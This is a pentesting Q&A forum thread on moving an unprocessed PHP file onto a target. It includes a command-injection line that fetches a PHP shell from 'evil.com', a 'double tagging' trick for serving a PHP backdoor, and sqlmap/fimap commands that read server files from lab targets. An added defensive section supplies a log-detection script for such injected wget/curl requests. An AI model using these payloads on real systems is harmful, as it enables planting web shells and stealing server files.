Welcome to Ask A Pentester, where you can get your security questions answered by members of the IT Security community!

Wget download ONLY PHP file

0 votes

Hi everyone,

This is a lame-ass question but I couldn't find an answer easily just googling around.

I want to download a .PHP file from a webserver but the original file, not the file once interpreted by the web browser.

What happens when I just do

wget http://the.webserver.com/file.php

is that the server processes the PHP code and I end up with the result instead of the original code.

Is there even a way to do this?

Thanks in advance!

Greg

asked 1 year ago in Tools by Dr. House contributor (590 points)

6 Answers

+1 vote

Best answer

What about renaming your file to foo.txt

a.b.c.d; wget http://server/foo.txt; mv foo.txt foo.php

In this case, your webserver does not interpret the PHP code inside the file.

Otherwise, it is possible to change your server configuration so that it does not interpret PHP, but I'm not sure it is possible for one file only.

answered 1 year ago by Nibbler enthusiast (390 points)
Nice! Easy and effective :)

Thanks!

Greg
+1 vote
Hi,

You can't download the source code except by having direct access to the server. The code is directly interpreted by the web browser.

If there is bad input validation on file inclusion, you can do local file inclusion and then discover the source code.

Nib
answered 1 year ago by Nibbler enthusiast (390 points)
+1 vote

Thanks for your answers, a lame question indeed.

The situation I had in mind is as follows:

1. I found a website vulnerable to command execution.

2. I have a webserver (www.evil.com) under my control, where I host a PHP shell (sbd.php)

3. I wanted to send this file to the victim doing something like

      a.b.c.d; wget http://www.evil.com/sbd.php

    (supposing that the web server has wget installed, of course :P)

4. Be able to call the PHP shell, now under the webserver tree of the victim.

But I guess there's no way to circumvent the HTTP protocol, even with total control of the "attacking" webserver. Bummer!

answered 1 year ago by Dr. House contributor (590 points)
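
For defenders, the request shape described in the answer above (a shell separator followed by wget and a URL inside a parameter) is visible in web server access logs. The following detection sketch is an added example, not part of the original thread; the log lines, hosts and the ping.php parameter are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Shell separator, then a download tool, then a URL,
# e.g. "a.b.c.d; wget http://host/file" as quoted in the thread.
FETCH_AFTER_SEPARATOR = re.compile(
    r"""(?:;|\|\|?|&&?|`|\$\(|\n)\s*(?:wget|curl)\s+[^\n]*?((?:https?|ftp)://[^\s'"`;|&)]+)""",
    re.IGNORECASE,
)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input (%253B) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_injected_fetches(log_lines):
    """Return (client_ip, fetched_url) for each request whose target carries
    a shell separator followed by wget/curl and a URL."""
    hits = []
    for line in log_lines:
        request = REQUEST_LINE.search(line)
        if not request:
            continue
        target = decode_fully(request.group(1))
        hit = FETCH_AFTER_SEPARATOR.search(target)
        if hit:
            hits.append((line.split(" ", 1)[0], hit.group(1)))
    return hits

# Constructed sample lines (combined log format); hosts and paths are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /ping.php?host=192.0.2.10 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /ping.php?host=192.0.2.10%3B%20wget%20http%3A%2F%2Fattacker.example%2Ffoo.txt HTTP/1.1" 200 298',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /ping.php?host=192.0.2.10%253Bcurl+-O+http://attacker.example/foo.txt HTTP/1.1" 200 301',
    '198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "GET /docs/wget-howto.html?ref=http://example.org/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, url in find_injected_fetches(SAMPLE_LOG):
        print(f"{ip} attempted injected download of {url}")
```

A hit here only shows that the request was made; whether the download succeeded has to be confirmed from egress logs or from new files appearing under the web root.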
+1 vote

Hi Greg ;)

I guess in that case you could use a "double tagging" trick.

(Have you guys realised how many security problems are "double tagging stuff"? ;) )

Following your example, your sbd.php file should be of the form:

<!-- begin double tagging --> <?php

print("<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->\n
<?php\n

     your_evil_php_code();\n

     [...] ");  <-- end of the print function

?>\n

?> <!-- end double tagging>

You would have to escape a lot of shit due to the print function ($, ", etc) but it works.

And it has the nice side effect that you don't have a functional php shell on your server waiting to be pwned! XD

Hope this helps!

answered 1 year ago by m0n0sapiens pro pentester (830 points)
0 votes
Yes, Nibbler is right. You can't do anything not specified in the HTTP protocol. When you use Wget, behind the scenes there's nothing other than GET, HEAD, PUT, etc. requests.

Fetching a file with wget is just a GET request; this will be processed by the web server like any other coming from a web browser.

Carlos
answered 1 year ago by m0n0sapiens pro pentester (830 points)
0 votes
The easiest way to grab a PHP file if you do not already have access to the web server is to either brute-force SSH/etc access (depending on open ports available on that server) or to find a file read inclusion vulnerability, PHP eval vulnerability, or a SQL injection vulnerability that allows for, say, a MySQL load file operation.

Shortcuts:

./fimap.py -v 3 -u "http://owaspbwa/mutillidae/index.php?page=index.php" -b -x

./wapiti.py http://owaspbwa/peruggia/ -v 2 -b folder -f txt -o p2.txt -m "-all,blindsql,sql"

./sqlmap.py -v 6 --delay=0 --predict-output --keep-alive --null-connection --dbms=MySQL -u "http://owaspbwa/peruggia/index.php?action=comment&pic_id=1" -p pic_id --level 5 --risk 3 --sql-query="load_file('/var/www/peruggia/index.php')"

./sqlmap.py -v 6 --delay=0 --predict-output --keep-alive --dbms=MySQL -u "http://owaspbwa/peruggia/index.php?action=login&check=1" --data "username=a" -p username --level 5 --risk 3 --sql-query="load_file('/var/www/peruggia/index.php')"
answered 1 year ago by atdre pro pentester (1,080 points)
